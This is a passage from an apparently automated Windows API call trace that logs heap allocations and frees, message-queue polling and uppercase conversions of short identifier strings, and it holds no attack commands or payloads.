lpMem=0x2aa97c0 | out: hHeap=0x2af0000) returned 1 [0102.961] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de88 [0102.961] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0102.961] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71908 [0102.961] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71868 [0102.961] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa97c0 [0102.961] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b38 [0102.961] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a717c8 [0102.961] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa99b8 [0102.961] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a717c8 | out: hHeap=0x2af0000) returned 1 [0102.961] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a717c8 [0102.961] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c10 [0102.961] CharUpperBuffW (in: lpsz="SSA2E00304E40", cchLength=0xd | out: lpsz="SSA2E00304E40") returned 0xd [0102.961] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c10 | out: hHeap=0x2af0000) returned 1 [0102.961] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a717c8 | out: hHeap=0x2af0000) returned 1 [0102.961] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99b8 | out: hHeap=0x2af0000) returned 1 [0102.961] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b38 | out: hHeap=0x2af0000) returned 1 [0102.962] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa97c0 | out: hHeap=0x2af0000) returned 1 [0102.962] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71868 | out: hHeap=0x2af0000) returned 1 [0102.962] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0102.962] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ed00 [0102.962] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0102.962] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ed00 | out: hHeap=0x2af0000) returned 1 [0102.962] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0102.962] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa97c0 [0102.962] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a717c8 [0102.962] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa97c0 | out: hHeap=0x2af0000) returned 1 [0102.962] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77aa8 [0102.962] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa97c0 [0102.962] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa99a0 [0102.962] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71868 [0102.962] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c10 [0102.962] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa99b8 [0102.962] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71908 [0102.962] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99b8 | out: hHeap=0x2af0000) returned 1 [0102.962] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c88 [0102.962] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a00 [0102.962] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa99d0 [0102.962] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77aa8 | out: hHeap=0x2af0000) returned 1 [0102.962] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a717c8 | out: hHeap=0x2af0000) returned 1 [0102.962] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa97c0 | out: hHeap=0x2af0000) returned 1 [0102.962] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0102.962] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa97c0 [0102.962] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a717c8 [0102.962] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa97c0 | out: hHeap=0x2af0000) returned 1 [0102.962] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77cb0 [0102.962] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa97c0 [0102.962] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b50 [0102.963] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ab8 [0102.963] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77aa8 [0102.963] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9940 [0102.963] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719c8 [0102.963] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9940 | out: hHeap=0x2af0000) returned 1 [0102.963] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77fd0 [0102.963] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a30 [0102.963] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9ac0 [0102.963] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77cb0 | out: hHeap=0x2af0000) returned 1 [0102.963] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a717c8 | out: hHeap=0x2af0000) returned 1 [0102.963] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa97c0 | out: hHeap=0x2af0000) returned 1 [0102.963] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0102.963] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa97c0 [0102.963] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a717c8 [0102.963] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa97c0 | out: hHeap=0x2af0000) returned 1 [0102.963] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77cb0 [0102.963] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa97c0 [0102.963] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9bf8 [0102.963] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a58 [0102.963] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78048 [0102.963] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa99b8 [0102.963] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719f8 [0102.963] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99b8 | out: hHeap=0x2af0000) returned 1 [0102.963] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78390 [0102.963] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9be0 [0102.963] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9bb0 [0102.963] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77cb0 | out: hHeap=0x2af0000) returned 1 [0102.963] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a717c8 | out: hHeap=0x2af0000) returned 1 [0102.963] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa97c0 | out: hHeap=0x2af0000) returned 1 [0102.963] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0102.963] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa97c0 [0102.963] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a717c8 [0102.964] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa97c0 | out: hHeap=0x2af0000) returned 1 [0102.964] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77cb0 [0102.964] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa97c0 [0102.964] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9ad8 [0102.964] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b08 [0102.964] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78110 [0102.964] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a48 [0102.964] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719a8 [0102.964] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a48 | out: hHeap=0x2af0000) returned 1 [0102.964] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a783e0 [0102.964] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b20 [0102.964] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9af0 [0102.964] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77cb0 | out: hHeap=0x2af0000) returned 1 [0102.964] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a717c8 | out: hHeap=0x2af0000) returned 1 [0102.964] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa97c0 | out: hHeap=0x2af0000) returned 1 [0102.964] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0102.964] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa97c0 [0102.964] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a717c8 [0102.964] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa97c0 | out: hHeap=0x2af0000) returned 1 [0102.964] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77cb0 [0102.964] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa97c0 [0102.964] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b38 [0102.964] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a38 [0102.964] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78228 [0102.964] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c28 [0102.964] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719e8 [0102.964] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c28 | out: hHeap=0x2af0000) returned 1 [0102.964] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ff8 [0102.964] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c10 [0102.964] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c28 [0102.964] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77cb0 | out: hHeap=0x2af0000) returned 1 [0102.964] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a717c8 | out: hHeap=0x2af0000) returned 1 [0102.965] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa97c0 | out: hHeap=0x2af0000) returned 1 [0102.965] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0102.965] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77cb0 [0102.965] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a717c8 [0102.965] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0102.965] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77cb0 | out: hHeap=0x2af0000) returned 1 [0102.965] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a717c8 | out: hHeap=0x2af0000) returned 1 [0102.965] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa97c0 [0102.965] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5dfa8 [0102.965] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0102.965] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a717c8 [0102.965] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71af8 [0102.965] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa99b8 [0102.965] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9940 [0102.965] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719b8 [0102.965] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a48 [0102.965] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0102.965] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ad8 [0102.965] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77cb0 [0102.965] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0102.965] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77cb0 | out: hHeap=0x2af0000) returned 1 [0102.965] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ad8 | out: hHeap=0x2af0000) returned 1 [0102.965] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a48 | out: hHeap=0x2af0000) returned 1 [0102.965] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9940 | out: hHeap=0x2af0000) returned 1 [0102.965] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99b8 | out: hHeap=0x2af0000) returned 1 [0102.965] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71af8 | out: hHeap=0x2af0000) returned 1 [0102.965] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a717c8 | out: hHeap=0x2af0000) returned 1 [0102.965] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ebc0 [0102.965] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0102.965] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ebc0 | out: hHeap=0x2af0000) returned 1 [0102.965] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0102.966] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a717c8 [0102.966] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77cb0 [0102.966] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a08 [0102.966] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0102.966] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77cb0 | out: hHeap=0x2af0000) returned 1 [0102.966] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a08 | out: hHeap=0x2af0000) returned 1 [0102.966] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa99b8 [0102.966] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a741a8 [0102.966] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0102.966] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b38 [0102.966] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ad8 [0102.966] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9940 [0102.966] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a48 [0102.966] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b98 [0102.966] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a60 [0102.966] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b98 | out: hHeap=0x2af0000) returned 1 [0102.966] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b48 [0102.966] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77cb0 [0102.966] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0102.966] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77cb0 | out: hHeap=0x2af0000) returned 1 [0102.966] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b48 | out: hHeap=0x2af0000) returned 1 [0102.966] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a60 | out: hHeap=0x2af0000) returned 1 [0102.966] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a48 | out: hHeap=0x2af0000) returned 1 [0102.966] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9940 | out: hHeap=0x2af0000) returned 1 [0102.966] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ad8 | out: hHeap=0x2af0000) returned 1 [0102.966] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b38 | out: hHeap=0x2af0000) returned 1 [0102.966] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ed00 [0102.966] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0102.966] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ed00 | out: hHeap=0x2af0000) returned 1 [0102.966] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0102.967] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a78 [0102.967] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a08 [0102.967] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9940 [0102.967] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a48 [0102.967] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719b8 [0102.967] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a60 [0102.967] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0102.967] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a60 | out: hHeap=0x2af0000) returned 1 [0102.967] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a48 | out: hHeap=0x2af0000) returned 1 [0102.967] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9940 | out: hHeap=0x2af0000) returned 1 [0102.967] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a08 | out: hHeap=0x2af0000) returned 1 [0102.967] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a78 | out: hHeap=0x2af0000) returned 1 [0102.967] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a741a8 | out: hHeap=0x2af0000) returned 1 [0102.967] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99b8 | out: hHeap=0x2af0000) returned 1 [0102.967] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b88 [0102.967] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7120 [0102.967] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa99b8 [0102.967] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a48 [0102.967] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b18 [0102.967] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a60 [0102.967] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b18 | out: hHeap=0x2af0000) returned 1 [0102.967] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a60 | out: hHeap=0x2af0000) returned 1 [0102.967] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a48 | out: hHeap=0x2af0000) returned 1 [0102.967] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99b8 | out: hHeap=0x2af0000) returned 1 [0102.967] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7120 | out: hHeap=0x2af0000) returned 1 [0102.967] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b88 | out: hHeap=0x2af0000) returned 1 [0102.967] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a717c8 | out: hHeap=0x2af0000) returned 1 [0102.967] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5edc0 [0102.967] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0102.967] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5edc0 | out: hHeap=0x2af0000) returned 1 [0102.968] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0102.968] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77cb0 [0102.968] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a717c8 [0102.968] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0102.968] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77cb0 | out: hHeap=0x2af0000) returned 1 [0102.968] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a717c8 | out: hHeap=0x2af0000) returned 1 [0102.968] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9a48 [0102.968] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a73b78 [0102.968] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0102.968] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a717c8 [0102.968] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71aa8 [0102.968] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9940 [0102.968] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa99b8 [0102.968] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a48 [0102.968] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a60 [0102.968] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a48 | out: hHeap=0x2af0000) returned 1 [0102.968] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b28 [0102.968] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77cb0 [0102.968] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0102.968] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77cb0 | out: hHeap=0x2af0000) returned 1 [0102.968] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b28 | out: hHeap=0x2af0000) returned 1 [0102.968] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a60 | out: hHeap=0x2af0000) returned 1 [0102.968] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99b8 | out: hHeap=0x2af0000) returned 1 [0102.968] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9940 | out: hHeap=0x2af0000) returned 1 [0102.968] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71aa8 | out: hHeap=0x2af0000) returned 1 [0102.968] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a717c8 | out: hHeap=0x2af0000) returned 1 [0102.968] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e840 [0102.968] PeekMessageW (in: 